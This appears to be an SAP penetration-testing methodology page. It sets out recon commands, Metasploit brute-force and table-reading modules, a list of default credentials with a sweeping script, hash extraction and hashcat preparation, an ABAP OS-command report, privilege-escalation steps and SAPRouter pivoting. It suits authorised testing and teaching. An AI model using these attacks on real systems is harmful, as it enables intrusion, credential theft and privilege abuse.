SAP Security Testing
Compiled SAP pentest methodology. Commands first — theory inline where needed. Covers the full chain from unauthenticated recon to privilege escalation inside the ABAP stack.
Recon and Enumeration
External Recon — Before Touching the Target
# Passive first: third-party SAP exposure scanners (redrays.io, erpscan.io) take a hostname and report
# exposed services and known CVE fingerprints without touching the target yourself. Treat their output as
# leads to verify, not findings.
# Shodan: the ICM answers with "Server: SAP NetWeaver Application Server / ABAP <rel>" or "/ AS Java <rel>"
shodan search 'port:8000 "SAP NetWeaver Application Server"'
shodan search 'port:50000 "SAP NetWeaver Application Server / AS Java"'
Active Enumeration
# SAP-focused nmap sweep; NN is the instance number. 32NN DIAG, 33NN gateway, 36NN message server,
# 80NN/443NN ICM HTTP/HTTPS, 81NN message server HTTP, 500NN Java HTTP, 5NN13/5NN14 SAP Management Console,
# 1128/1129 SAP Host Agent, 3299 SAPRouter (already inside the 32NN range)
nmap -sV -p 1128,1129,3200-3299,3300-3399,3600-3699,8000-8099,8100-8199,44300-44399,50000-50099,50013,50014 <target>
# ICM endpoint probe (ABAP stack). /sap/public/info needs no logon and returns RFC_SYSTEM_INFO data
# (SID, host, release, kernel, DB type); /sap/bc/ping and /sap/bc/soap/rfc answer 401 when active but locked down
curl -i http://<target>:8000/sap/bc/ping
curl -s http://<target>:8000/sap/public/info
curl -i http://<target>:8000/sap/bc/soap/rfc/
# Message server: the HTTP port is 81NN (parameter ms/http_port), not 36NN, which speaks the binary protocol
# (pysap's ms_dump_info.py does). Lists every application server in the landscape, no auth
curl http://<target>:8100/msgserver/text/logon
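The unauthenticated `/sap/public/info` response is the richest single recon artifact on the ABAP stack, so it is worth parsing rather than eyeballing. The script below is an added example (not part of the original page): it pulls the RFCSI fields out of the response and derives the instance number, and from it the port layout used in the nmap line above. The embedded response is constructed to mirror the RFCSI_EXPORT structure; replace it with the output of `curl -s http://<target>:8000/sap/public/info`.

```python
"""Parse the unauthenticated /sap/public/info response (RFC_SYSTEM_INFO over ICF).

Added example, not code from the original page. SAMPLE is constructed to mirror
the RFCSI_EXPORT structure; feed a live response from
    curl -s http://<target>:8000/sap/public/info
"""
import sys
import xml.etree.ElementTree as ET

# RFCSI fields worth recording during recon
FIELDS = ("RFCSYSID", "RFCDEST", "RFCHOST", "RFCIPADDR", "RFCSAPRL",
          "RFCKERNRL", "RFCOPSYS", "RFCDBSYS", "RFCDBHOST")

SAMPLE = """<?xml version="1.0" encoding="utf-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
 <SOAP-ENV:Body>
  <rfc:RFC_SYSTEM_INFO.Response xmlns:rfc="urn:sap-com:document:sap:rfc:functions">
   <RFCSI_EXPORT>
    <RFCPROTO>011</RFCPROTO><RFCCHARTYP>4103</RFCCHARTYP>
    <RFCDEST>sapdev01_DEV_00</RFCDEST><RFCHOST>sapdev01</RFCHOST>
    <RFCSYSID>DEV</RFCSYSID><RFCDBHOST>sapdev01</RFCDBHOST>
    <RFCDBSYS>HDB</RFCDBSYS><RFCSAPRL>750</RFCSAPRL>
    <RFCOPSYS>Linux</RFCOPSYS><RFCIPADDR>10.10.1.15</RFCIPADDR>
    <RFCKERNRL>753</RFCKERNRL>
   </RFCSI_EXPORT>
  </rfc:RFC_SYSTEM_INFO.Response>
 </SOAP-ENV:Body>
</SOAP-ENV:Envelope>"""


def _local(tag):
    """Strip an XML namespace prefix: '{ns}RFCHOST' -> 'RFCHOST'."""
    return tag.rsplit("}", 1)[-1]


def parse_public_info(xml_text):
    """Return {field: value} for the RFCSI fields present in an info response."""
    root = ET.fromstring(xml_text)
    found = {}
    for el in root.iter():
        name = _local(el.tag)
        if name in FIELDS and el.text and el.text.strip():
            found[name] = el.text.strip()
    # RFCDEST is <host>_<SID>_<instance number>; the instance number fixes the
    # port layout of the whole instance (32NN DIAG, 33NN gateway, ...).
    dest = found.get("RFCDEST", "")
    if dest.count("_") >= 2:
        found["INSTANCE_NO"] = dest.rsplit("_", 1)[-1]
    return found


def derived_ports(instance_no):
    """Standard per-instance ports for a two-digit instance number."""
    nn = int(instance_no)
    return {"diag": 3200 + nn, "gateway": 3300 + nn, "msgserver": 3600 + nn,
            "http": 8000 + nn, "https": 44300 + nn, "ms_http": 8100 + nn}


if __name__ == "__main__":
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE
    info = parse_public_info(text)
    for key, value in info.items():
        print(f"{key:12} {value}")
    if "INSTANCE_NO" in info:
        print(derived_ports(info["INSTANCE_NO"]))
```

Pipe a live response in (`curl -s http://<target>:8000/sap/public/info | python3 sapinfo.py`); with no stdin it parses the constructed sample. The kernel release (RFCKERNRL) is what you compare against kernel-level fixes such as ICMAD later on this page.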
Metasploit Service Discovery
msf > use auxiliary/scanner/sap/sap_service_discovery
msf > set RHOSTS <target>
msf > run
msf > use auxiliary/scanner/sap/sap_icm_urlscan
msf > set RHOSTS <target>
msf > run
Default Credentials
Check these before anything else — still present on many production systems.
| Username | Password | Client(s) where it ships | Notes |
|---|---|---|---|
| SAP* | 06071992 | 000, 001, 066 | Default super user |
| SAP* | PASS | any client with no SAP* record in USR02 | Hard-coded in the kernel, active while login/no_automatic_user_sapstar = 0 |
| DDIC | 19920706 | 000, 001 | Data dictionary and upgrade user |
| TMSADM | PASSWORD or $1Pawd2& | 000 | Transport management RFC user |
| SAPCPIC | ADMIN | 000, 001 | CPI-C / RFC service user |
| EARLYWATCH | SUPPORT | 066 | EarlyWatch reporting user |
# MSF: logon attempts go over SOAP RFC (RFC_PING via /sap/bc/soap/rfc on the ICM HTTP port 80NN),
# so RPORT is 8000, not the gateway port. The module tries the standard SAP accounts by default; see show options
msf > use auxiliary/scanner/sap/sap_soap_rfc_brute_login
msf > set RHOSTS <target>
msf > set RPORT 8000
msf > set CLIENT 000
msf > run
# Custom wordlists. Mind login/fails_to_user_lock (default 5): spraying a long list locks real users
msf > set USER_FILE /path/to/sap_users.txt
msf > set PASS_FILE /path/to/sap_passwords.txt
# Same idea against the WebGUI logon form
msf > use auxiliary/scanner/sap/sap_web_gui_brute_login
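Default accounts are a handful of user/password/client combinations, so a targeted check is both faster and safer than a wordlist spray. The script below is an added example, not from the original page: it tries each default against the authenticated ICF service `/sap/bc/ping` with HTTP Basic auth and `sap-client` in the query string, where 200 means the logon succeeded and 401 means it did not. The HTTP call is injected so the logic can be exercised offline; the real fetcher uses only the standard library. Every failed attempt still counts toward login/fails_to_user_lock, so add extra clients deliberately rather than 000-999.

```python
"""Check SAP default credentials against an ICF service with HTTP Basic auth.

Added example, not code from the original page. Target: /sap/bc/ping, an
authenticated ICF service that returns HTTP 200 on a successful logon.
"""
import base64
import sys
import urllib.error
import urllib.request

# (user, password, clients where the account ships by default)
DEFAULTS = [
    ("SAP*", "06071992", ("000", "001", "066")),
    ("SAP*", "PASS", ("000", "001", "066")),
    ("DDIC", "19920706", ("000", "001")),
    ("TMSADM", "PASSWORD", ("000",)),
    ("TMSADM", "$1Pawd2&", ("000",)),
    ("SAPCPIC", "ADMIN", ("000", "001")),
    ("EARLYWATCH", "SUPPORT", ("066",)),
]


def http_status(url, user, password, timeout=5):
    """Real fetch: HTTP status of a Basic-auth GET (401 for a rejected logon)."""
    token = base64.b64encode(f"{user}:{password}".encode("latin-1")).decode()
    req = urllib.request.Request(url, headers={"Authorization": "Basic " + token})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def sweep_defaults(base_url, fetch=http_status, extra_clients=()):
    """Return [(client, user, password)] for every default that logged in.

    fetch(url, user, password) -> HTTP status; injected so tests run offline.
    extra_clients are added to each account's default clients (e.g. the
    productive client 100), one attempt per account per client.
    """
    hits = []
    for user, password, clients in DEFAULTS:
        for client in sorted(set(clients) | set(extra_clients)):
            url = f"{base_url}/sap/bc/ping?sap-client={client}"
            if fetch(url, user, password) == 200:
                hits.append((client, user, password))
    return hits


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "http://<target>:8000"
    clients = tuple(sys.argv[2:])  # e.g. 100 200
    for client, user, password in sweep_defaults(target, extra_clients=clients):
        print(f"VALID  client={client} user={user} password={password}")
```

Run it as `python3 sapdefaults.py http://<target>:8000 100`. A 200 here is a working logon, not just a working password: the same credentials then drive the SOAP RFC and OData calls further down this page.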
RFC Exploitation
RFC (Remote Function Call) is SAP's proprietary protocol for inter-system communication. Natively it rides on the gateway (33NN); the same function modules are also reachable over HTTP as SOAP at /sap/bc/soap/rfc. Both need a valid logon, but S_RFC only controls access per function group, and many RFC-enabled modules do far more than the calling user's role intended because the authorization checks inside them are weak or missing.
Key RFC Function Modules
| Module / program | Purpose | Risk |
|---|---|---|
| RFC_SYSTEM_INFO | System info (the data behind /sap/public/info) | Release, kernel, DB, host and IP disclosure |
| RFC_READ_TABLE | Read any DB table (512-byte rows) | USR02 hashes (raw fields come back transformed, see hashcat note below), business data |
| RFC_ABAP_INSTALL_AND_RUN | Install and run an ABAP program | RCE on the ABAP stack; needs S_DEVELOP, locked by a security note on current releases |
| RFC_REMOTE_EXEC / RFC_REMOTE_PIPE | Served by the rfcexec program registered at the gateway, not an ABAP module | OS-level RCE on the rfcexec host when reg_info/sec_info let you reach it |
| BAPI_USER_CHANGE | Set a new password for any user (S_USER_GRP ACTVT 05 on the target's group) | Credential reset without the old password; SUSR_USER_CHANGE_PASSWORD_RFC by contrast needs the current password |
| TH_SAPREL | Get SAP release info | Version disclosure |
| SXPG_CALL_SYSTEM / SXPG_COMMAND_EXECUTE | Run external commands defined in SM69 | OS command execution; arbitrary if the SM69 definition allows additional parameters |
Enumerate Available RFC Modules
# The authoritative list is table TFDIR (FMODE = 'R' marks RFC-enabled modules); SE37 shows each interface.
# Remotely, the MSF SOAP-RFC modules talk to /sap/bc/soap/rfc on the ICM HTTP port (80NN), not the gateway,
# and take HttpUsername/HttpPassword plus CLIENT. RFC_SYSTEM_INFO is the cheapest reachability test:
msf > use auxiliary/scanner/sap/sap_soap_rfc_system_info
msf > set RHOSTS <target>
msf > set RPORT 8000
msf > set CLIENT 000
msf > set HttpUsername <user>
msf > set HttpPassword <pass>
msf > run
# Which RFC_* / SXPG_* modules the account may call is decided by S_RFC on the function group. A SOAP fault
# "No RFC authorization for function module ..." means S_RFC is missing for that group, not that the module is absent.
Read USR02 Password Hashes via RFC
# RFC_READ_TABLE over SOAP. Rows are capped at 512 bytes, so select only the columns you need
msf > use auxiliary/scanner/sap/sap_soap_rfc_read_table
msf > set RHOSTS <target>
msf > set RPORT 8000
msf > set CLIENT 000
msf > set HttpUsername <user>
msf > set HttpPassword <pass>
msf > set TABLE USR02
msf > set FIELDS BNAME,CODVN,BCODE,PASSCODE,PWDSALTEDHASH
msf > run
# Hash formats: BCODE = CODVN B (hashcat -m 7700), PASSCODE = CODVN F/G (-m 7800),
# PWDSALTEDHASH = CODVN H, "{x-issha, 1024}..." (-m 10300). Hashes pulled through RFC_READ_TABLE
# come back transformed; hashcat has -m 7701 / -m 7801 for exactly those.
# Direct HANA SQL (OS access as <sid>adm; DEFAULT is the hdbuserstore key, the ABAP schema is SAP<SID> or SAPABAP1).
# HANA writes binary literals as X'...'; UFLAG 0 = account not locked
hdbsql -n localhost -U DEFAULT \
  "SELECT MANDT,BNAME,CODVN,UFLAG,GLTGB,BCODE,PASSCODE,PWDSALTEDHASH FROM <SCHEMA>.USR02 WHERE BCODE <> X'0000000000000000' OR PWDSALTEDHASH <> ''"
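Three hash columns means three hashcat modes, and the practitioner's question is which one to crack per user. When login/password_downwards_compatibility is above 0 the system keeps the legacy BCODE/PASSCODE next to PWDSALTEDHASH, and those crack orders of magnitude faster than the iterated salted SHA-1. The script below is an added example (not from the original page): it takes USR02 rows, picks the weakest stored hash for each user and emits one input file per hashcat mode. The rows are constructed with dummy hash values; real ones come from RFC_READ_TABLE, SE16 or hdbsql as above.

```python
"""Turn USR02 rows into hashcat input files, choosing the weakest stored hash per user.

Added example, not code from the original page. ROWS is constructed (dummy hashes).
  BCODE          CODVN B    -> hashcat -m 7700   line format USER$16HEX
  PASSCODE       CODVN F/G  -> hashcat -m 7800   line format USER$40HEX
  PWDSALTEDHASH  CODVN H    -> hashcat -m 10300  line is the {x-issha, 1024}... string
"""
ZERO8 = "00" * 8     # empty BCODE (8 raw bytes)
ZERO20 = "00" * 20   # empty PASSCODE (20 raw bytes)

ROWS = [  # constructed sample rows
    {"BNAME": "DDIC", "CODVN": "H", "BCODE": "0123456789ABCDEF",
     "PASSCODE": "00112233445566778899AABBCCDDEEFF00112233",
     "PWDSALTEDHASH": "{x-issha, 1024}AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"},
    {"BNAME": "BATCH_01", "CODVN": "H", "BCODE": ZERO8, "PASSCODE": ZERO20,
     "PWDSALTEDHASH": "{x-issha, 1024}BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"},
    {"BNAME": "OLDUSER", "CODVN": "B", "BCODE": "FEDCBA9876543210",
     "PASSCODE": ZERO20, "PWDSALTEDHASH": ""},
]


def hashcat_lines(rows, via_rfc_read_table=False):
    """Return {hashcat_mode: [lines]}, one line per user in the weakest available format.

    A populated BCODE or PASSCODE next to PWDSALTEDHASH is the downward-compatible
    hash; cracking it yields the same password as the CODVN H hash. If the rows
    were pulled with RFC_READ_TABLE, hashcat's 7701/7801 variants apply instead.
    """
    legacy_b, legacy_fg = (7701, 7801) if via_rfc_read_table else (7700, 7800)
    out = {legacy_b: [], legacy_fg: [], 10300: []}
    for row in rows:
        user = row["BNAME"].strip().upper()
        bcode = (row.get("BCODE") or "").upper()
        passcode = (row.get("PASSCODE") or "").upper()
        salted = (row.get("PWDSALTEDHASH") or "").strip()
        if bcode and bcode != ZERO8:
            out[legacy_b].append(f"{user}${bcode}")
        elif passcode and passcode != ZERO20:
            out[legacy_fg].append(f"{user}${passcode}")
        elif salted.startswith("{x-issha"):
            out[10300].append(salted)
        # rows with no hash at all (e.g. SNC-only or locked users) are skipped
    return out


def write_files(by_mode, prefix="usr02"):
    """Write one file per non-empty mode; return the hashcat command lines to run."""
    commands = []
    for mode, lines in by_mode.items():
        if not lines:
            continue
        name = f"{prefix}_m{mode}.txt"
        with open(name, "w", encoding="utf-8") as fh:
            fh.write("\n".join(lines) + "\n")
        commands.append(f"hashcat -m {mode} {name} <wordlist>")
    return commands


if __name__ == "__main__":
    for cmd in write_files(hashcat_lines(ROWS)):
        print(cmd)
```

Note that CODVN B passwords are upper-cased and truncated to 8 characters before hashing, so a cracked BCODE may need a case fix-up before it works on the CODVN H logon; CODVN F/G and H preserve case.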
Privilege Escalation Inside SAP (Post-Auth)
Once you have any SAP account, check the following escalation paths.
1. S_DEVELOP: Debugger with Replace, and Your Own ABAP
S_DEVELOP with OBJTYPE=DEBUG and ACTVT=02 (debug with replace) lets you stop at an AUTHORITY-CHECK and overwrite sy-subrc with 0, so the caller treats the check as passed; ACTVT=03 is display-only debugging and is not enough. S_DEVELOP on PROG/FUGR with ACTVT=01/02 additionally lets you create, activate and run your own code in SE38/SE37. System parameters are a separate path (RZ10/RZ11 with S_RZL_ADM), not part of S_DEVELOP.
Transaction: SE38 / SE37 / SE80, or /h in any transaction to start the debugger
1. Open the program or function module (or start the target transaction and type /h)
2. Set a breakpoint on the AUTHORITY-CHECK statement (or on CALL FUNCTION 'AUTHORITY_CHECK_TCODE')
3. When it fires, step past the check and change sy-subrc to 0. Field changes in the debugger are written to the system log (SM21), so expect a trace
With S_DEVELOP on PROG (create/activate), or just S_PROGRAM to run existing reports via SE38/SA38, OS command execution is one report away unless rdisp/call_system = 0 disables the kernel call:
* RSBDCOS0 is a standard SAP report: run it from SE38/SA38 and type the command. Equivalent minimal program:
REPORT zcmd.
DATA: cmd(255) VALUE 'whoami', BEGIN OF out OCCURS 0, line(255), END OF out.
CALL 'SYSTEM' ID 'COMMAND' FIELD cmd ID 'TAB' FIELD out-*sys*.
LOOP AT out. WRITE / out-line. ENDLOOP.
2. SAP_ALL / SAP_NEW: Full Admin Profiles
SAP_ALL is the composite profile that carries every authorization object with full values. SAP_NEW is not an admin profile as such: it collects the authorizations introduced in each release and is handed out during upgrades, but it is still an extremely broad grant that should never survive on a productive user. Find holders:
Transaction: SUIM
-> User -> Users by Complex Selection Criteria -> By Profiles
-> Profile: SAP_ALL (then repeat for SAP_NEW)
-> Execute
Or read the assignment table directly: SE16 -> table UST04 -> PROFILE = SAP_ALL (columns MANDT, BNAME, PROFILE).
Assign it if you have user administration rights (S_USER_GRP ACTVT 02 on the target's user group and S_USER_PRO for the profile); the assignment is written to the user change documents:
Transaction: SU01
-> User -> Change
-> Profiles tab -> Add SAP_ALL -> Save
3. Background Jobs: SM36 / SM37
A background step runs under its step user, not under whoever scheduled it. S_BTCH_NAM (BTCUNAME = * or a privileged name) lets you schedule a step in SM36 as DDIC or a BASIS admin; S_BTCH_ADM = Y lets you change or copy other users' scheduled jobs in SM37 while keeping their step user. Either way the step executes an ABAP report (RSBDCOS0 with a variant, for example) or an SM69 external command with the victim's authorizations.
Transaction: SM37
-> Username: *
-> Job Status: Scheduled / Released
-> Find jobs whose steps run as DDIC, SAP* or a BASIS admin (Job -> Step list shows the step user)
-> Job -> Change -> Step -> swap the program/variant or external command -> Save; or Job -> Copy and add your own step
4. Unencrypted Browser Logon (SNC Does Not Cover HTTP)
SNC (Secure Network Communications) protects DIAG and RFC only. Browser access to the ABAP stack (WebGUI, BSP, Web Dynpro, OData) is protected solely by TLS on the ICM, so a system that enforces SNC for SAP GUI can still accept cleartext logons on 80NN if icm/server_port_<n> still defines a PROT=HTTP port without an icm/HTTP/redirect_<n> rule to HTTPS. Even on HTTPS, a client that trusts a rogue certificate hands the same credentials to an interceptor.
# Is WebGUI reachable over plain HTTP (no redirect to 443NN)?
curl -i http://<target>:8000/sap/bc/gui/sap/its/webgui
# 200 with the logon form (instead of 301/302 to https://) = credentials cross the wire in cleartext
# as the sap-user / sap-password / sap-client POST fields of the ICF logon form
# On HTTPS: proxy the browser through Burp and watch the same POST; check whether login/ticket_only_by_https is set
5. Fiori Launchpad vs Back-End OData
The launchpad catalogs and tiles decide what a user sees; whether an OData service can be called is decided in the back end by the ICF node being active, S_SERVICE for the service, and the application's own checks. A user without a tile but with the role can call the service directly, and a service whose role assignment is broader than its catalog leaks data to anyone holding the role. Probe services directly with credentials and sap-client set, and quote the URL so the shell does not expand $top.
# Access an OData service directly
curl -u <user>:<pass> 'http://<target>:8000/sap/opu/odata/sap/<service_name>/?sap-client=<client>&$format=json'
curl -u <user>:<pass> 'http://<target>:8000/sap/opu/odata/sap/<service_name>/<EntitySet>?$top=100&$format=json'
# Illustrative service and entity names (take the real ones from the catalog below)
curl -u <user>:<pass> 'http://<target>:8000/sap/opu/odata/sap/ZHRMASTER_SRV/EmployeeSet?$top=100'
curl -u <user>:<pass> 'http://<target>:8000/sap/opu/odata/sap/FINANCIAL_DOCUMENTS_SRV/$metadata'
# List registered services (Gateway catalog service; the legacy path without ;v=2 also exists)
curl -u <user>:<pass> 'http://<target>:8000/sap/opu/odata/IWFND/CATALOGSERVICE;v=2/ServiceCollection?$format=json'
# 403 = S_SERVICE missing (the back end is doing its job); 200 on a service with no tile = front-end-only restriction
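The catalog-then-probe loop above is tedious by hand once a system has a few hundred registered services. The script below is an added example (not part of the original page): it reads the ServiceCollection, builds the probe URL for each service with `sap-client` and `$format` appended safely, and classifies the HTTP status the way the previous section does. The catalog JSON is constructed in the shape of the IWFND/CATALOGSERVICE;v=2 response; the field names `TechnicalServiceName` and `ServiceUrl` are assumed from that service's metadata, so adjust them if your catalog differs. The HTTP call is injected so the logic runs offline.

```python
"""Enumerate OData services from the Gateway catalog and probe them directly.

Added example, not code from the original page. CATALOG is constructed in the
shape of IWFND/CATALOGSERVICE;v=2 ServiceCollection; the field names
TechnicalServiceName and ServiceUrl are assumptions about that service's model.
"""
import base64
import json
import sys
import urllib.error
import urllib.request
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

CATALOG = json.dumps({"d": {"results": [  # constructed sample catalog
    {"TechnicalServiceName": "ZHRMASTER_SRV",
     "ServiceUrl": "http://sap.example:8000/sap/opu/odata/sap/ZHRMASTER_SRV/"},
    {"TechnicalServiceName": "FINANCIAL_DOCUMENTS_SRV",
     "ServiceUrl": "http://sap.example:8000/sap/opu/odata/sap/FINANCIAL_DOCUMENTS_SRV/"},
    {"TechnicalServiceName": "CATALOGSERVICE",
     "ServiceUrl": "http://sap.example:8000/sap/opu/odata/IWFND/CATALOGSERVICE;v=2/"},
]}})

# What each status means for the "front-end restriction only?" question
MEANING = {
    200: "callable: back-end role grants S_SERVICE, launchpad tile irrelevant",
    401: "needs credentials",
    403: "blocked by S_SERVICE / application authorization",
    404: "ICF node inactive or service not registered on this system",
}


def services_from_catalog(catalog_json):
    """[(technical name, service root URL)] from a ServiceCollection JSON body."""
    entries = json.loads(catalog_json)["d"]["results"]
    return [(e["TechnicalServiceName"], e["ServiceUrl"]) for e in entries]


def with_params(url, **params):
    """Append query parameters; '$' is kept literal so $format/$top survive."""
    parts = urlsplit(url)  # keeps ';v=2' inside the path
    query = dict(parse_qsl(parts.query))
    query.update(params)
    return urlunsplit(parts._replace(query=urlencode(query, safe="$")))


def classify(status):
    return MEANING.get(status, f"HTTP {status}")


def http_status(url, user, password, timeout=10):
    """Real fetch: HTTP status of a Basic-auth GET (HTTPError carries the code)."""
    token = base64.b64encode(f"{user}:{password}".encode("latin-1")).decode()
    req = urllib.request.Request(url, headers={"Authorization": "Basic " + token})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def probe_services(catalog_json, user, password, client, fetch=http_status):
    """{service name: (probe URL, meaning)} for every service in the catalog."""
    results = {}
    for name, url in services_from_catalog(catalog_json):
        probe = with_params(url, **{"sap-client": client, "$format": "json"})
        results[name] = (probe, classify(fetch(probe, user, password)))
    return results


if __name__ == "__main__":
    # python3 odata_probe.py <user> <pass> <client> < catalog.json
    user, password, client = sys.argv[1:4]
    body = sys.stdin.read() or CATALOG
    for name, (probe, meaning) in probe_services(body, user, password, client).items():
        print(f"{name:40} {meaning}")
```

Feed it the saved ServiceCollection (`curl -u u:p '.../ServiceCollection?$format=json' > catalog.json`). Because the catalog itself needs a logon, the interesting comparison is between two accounts: a service that is 200 for a user whose launchpad never shows it is the finding.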
Useful Transaction Codes (Once Logged In)
| T-Code | Purpose | Pentest Use |
|---|---|---|
| SE38 | ABAP Editor | Run or create programs (RSBDCOS0 for OS commands) |
| SA38 | ABAP Reporting | Run existing programs with S_PROGRAM only |
| SM36 / SM37 | Background job scheduling / monitoring | Step user abuse for privesc (S_BTCH_NAM, S_BTCH_ADM) |
| SU01 | User Maintenance | Create/modify users, assign profiles |
| SU56 | User Buffer | View the authorizations loaded for the current user |
| SUIM | User Information System | Find users with specific auth objects, profiles or roles |
| PFCG | Role Maintenance | Create/modify roles |
| SM50 | Work Process Monitor | Active process list, debugging of other sessions with the right auths |
| SM59 | RFC Destinations | Destinations with stored credentials or trusted-RFC to other systems |
| SE16 | Table Browser | Direct table access (USR02, UST04, RFCDES) |
| SE16N | Enhanced Table Browser | Table access; historical &sap_edit for editing, removed by later notes |
| DBACOCKPIT | DB Cockpit | Direct SQL against the database |
| SM69 / SM49 | External OS Commands: define / execute | Predefined commands, parameter injection if additional parameters are allowed |
| STMS | Transport Management | Modify transport routes, import arbitrary transports |
| RZ10 / RZ11 | Profile Parameter Maintenance | Modify system parameters (auth/*, login/*, rdisp/call_system) |
Key CVEs — Quick Reference
CVE-2020-6287 — SAP RECON (CVSS 10.0)
Unauthenticated RCE in SAP NetWeaver AS Java via the LM Configuration Wizard (component LM-CTC): the CTCWebService lets an anonymous caller create a Java administrator user and run OS commands. See SAP RECON — CVE-2020-6287 for full exploitation steps.
# Check whether the wizard servlet answers without authentication
curl -i http://<target>:50000/CTCWebService/CTCWebServiceBean/ConfigServlet
# HTTP 200 (rather than 401/404) = wizard reachable and almost certainly unpatched.
# (/developmentserver/metadatauploader is a different Java endpoint and says nothing about RECON.)
# Affects: SAP NetWeaver AS Java 7.30, 7.31, 7.40, 7.50
# Patch: SAP Security Note 2934135; interim workaround: disable the tc~lm~ctc~cul~startup_app application
CVE-2020-6207 — SAP SolMan EEM (CVSS 10.0)
Missing authentication on the Solution Manager EEM/UXMon administration SOAP service. Because EEM drives the SMD agents installed on every managed system, the commands run on all connected hosts as the agent user, not just on the Solution Manager itself.
# Check if the EEM admin endpoint is accessible
curl -i http://<target>:50000/EemAdminService/EemAdmin?wsdl
# WSDL returned without a logon = endpoint exposed
# Affects: SAP Solution Manager 7.2
# Patch: SAP Security Note 2890213
# PoC: github.com/chipik/SAP_EEM_CVE-2020-6207
CVE-2022-22536 — ICMAD HTTP Request Smuggling (CVSS 10.0)
HTTP request smuggling in SAP ICM (Internet Communication Manager). An unauthenticated attacker can desynchronize the ICM's view of the request stream and have its prepended data treated as part of other users' requests, which yields session hijacking and privilege escalation on both stacks.
# Affects: SAP NetWeaver AS ABAP, AS Java, SAP Web Dispatcher, SAP Content Server 7.53
# Patch: SAP Security Note 3123396 (kernel fix: compare the kernel patch level from SM51 / disp+work -V with the note)
# Detection: Onapsis published an open-source checker, github.com/Onapsis/onapsis_icmad_scanner; response-level
# symptoms are unreliable, so use the scanner plus the kernel level rather than hunting for odd Content-Length values
SAPRouter Exploitation (Port 3299)
SAPRouter is an application-level proxy for SAP traffic (DIAG, RFC and anything else its table allows). Its ACL is saprouttab on the router host; saprfc.ini is only the client-side file that names a route. A table that permits wildcard destinations turns an Internet-facing SAPRouter into a pivot into the whole internal SAP landscape.
# Info request (answers with the route table and connections when the admin interface is not restricted)
msf > use auxiliary/scanner/sap/sap_router_info_request
msf > set RHOSTS <target>
msf > set RPORT 3299
msf > run
# Port-scan internal hosts through the router; what comes back is exactly what saprouttab permits
msf > use auxiliary/scanner/sap/sap_router_portscanner
msf > set RHOSTS <internal_target>
msf > set SAPROUTER_HOST <target>
msf > set SAPROUTER_PORT 3299
msf > run
# Pivot: give SAP GUI, NWRFC or pysap a route string that chains through the router
#   /H/<saprouter>/S/3299/H/<internal-host>/S/3200
# pysap's router_admin.py and router_scanner.py speak the protocol directly
# Reference: https://www.rapid7.com/blog/post/2014/01/09/piercing-saprouter-with-metasploit/
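Whether a SAPRouter is a pivot comes down to its saprouttab, and the file is small enough to audit mechanically once you have it (from the host, or via the info request when the admin port is open). The script below is an added example (not part of the original page): it parses the table, flags the rules a pentester cares about, and builds the `/H/...` route strings used to go through the router. The sample table is constructed; it shows the common mistake of a wildcard permit that silently shadows every restrictive line after it, since SAPRouter applies the first matching rule.

```python
"""Audit a saprouttab and build /H/ route strings for pivoting through SAPRouter.

Added example, not code from the original page. SAMPLE is constructed.
saprouttab lines: <action> <source-host> <dest-host> <dest-service> [password]
  P = permit, P* = permit any protocol, D = deny, S = permit only with SNC,
  '*' = any; rules are evaluated top-down and the first match wins.
"""
SAMPLE = """\
# looks hardened, is not: line 3 makes everything below it unreachable
P  10.20.0.0/16  sapprd01  3200
P  *             *         *
D  *             *         3299
S  *             sapprd01  3300
P  *             saptst01  3200   s3cret
"""

PERMITS = ("P", "P*")


def parse_saprouttab(text):
    """Parse into dicts; malformed lines are kept as {'line', 'error'}."""
    rules = []
    for number, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        if len(parts) < 4:
            rules.append({"line": number, "error": f"malformed entry: {raw.strip()}"})
            continue
        action, src, dst, svc = parts[:4]
        rules.append({"line": number, "action": action.upper(), "src": src, "dst": dst,
                      "svc": svc, "password": parts[4] if len(parts) > 4 else None})
    return rules


def audit(rules):
    """Return [(line, finding)] for an ordered rule list."""
    findings = []
    shadowed_from = None  # line number of a P * * * that swallows everything after it
    for rule in rules:
        if "error" in rule:
            findings.append((rule["line"], rule["error"]))
            continue
        if shadowed_from is not None:
            findings.append((rule["line"], f"never evaluated: shadowed by P * * * on line {shadowed_from}"))
            continue
        permit = rule["action"] in PERMITS
        if permit and rule["dst"] == "*" and rule["svc"] == "*":
            findings.append((rule["line"], f"open relay: source {rule['src']} may reach any host and port"))
            if rule["src"] == "*":
                shadowed_from = rule["line"]
        elif permit and rule["svc"] in ("*", "3299"):
            findings.append((rule["line"], f"permits {rule['dst']}:{rule['svc']} (any port / SAPRouter chaining)"))
        if rule.get("password"):
            findings.append((rule["line"], "route password stored in cleartext; anyone reading the table can use the route"))
    return findings


def route_string(hops):
    """hops = [(host, port) or (host, port, password)]; the last hop is the target.

    /W/<password> follows the hop whose saprouttab entry demands it.
    """
    out = []
    for hop in hops:
        host, port = hop[0], hop[1]
        out.append(f"/H/{host}/S/{port}")
        if len(hop) > 2 and hop[2]:
            out.append(f"/W/{hop[2]}")
    return "".join(out)


if __name__ == "__main__":
    for line, finding in audit(parse_saprouttab(SAMPLE)):
        print(f"line {line}: {finding}")
    print(route_string([("saprouter.example", 3299), ("10.20.5.10", 3200)]))
```

The route string is what you paste into the SAP GUI connection (Advanced, "use route string") or hand to pysap; the findings tell you in advance whether the router will let it through.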
Code Scanning
Two complementary options for static analysis of custom ABAP and the configuration around it:
- Inside the system: the ABAP Test Cockpit (transaction ATC, built on the Code Inspector, SCI) ships security checks for custom code, and SAP's separately licensed Code Vulnerability Analyzer adds the deeper data-flow ones. Run them on the Z*/Y* namespace with the security check variant.
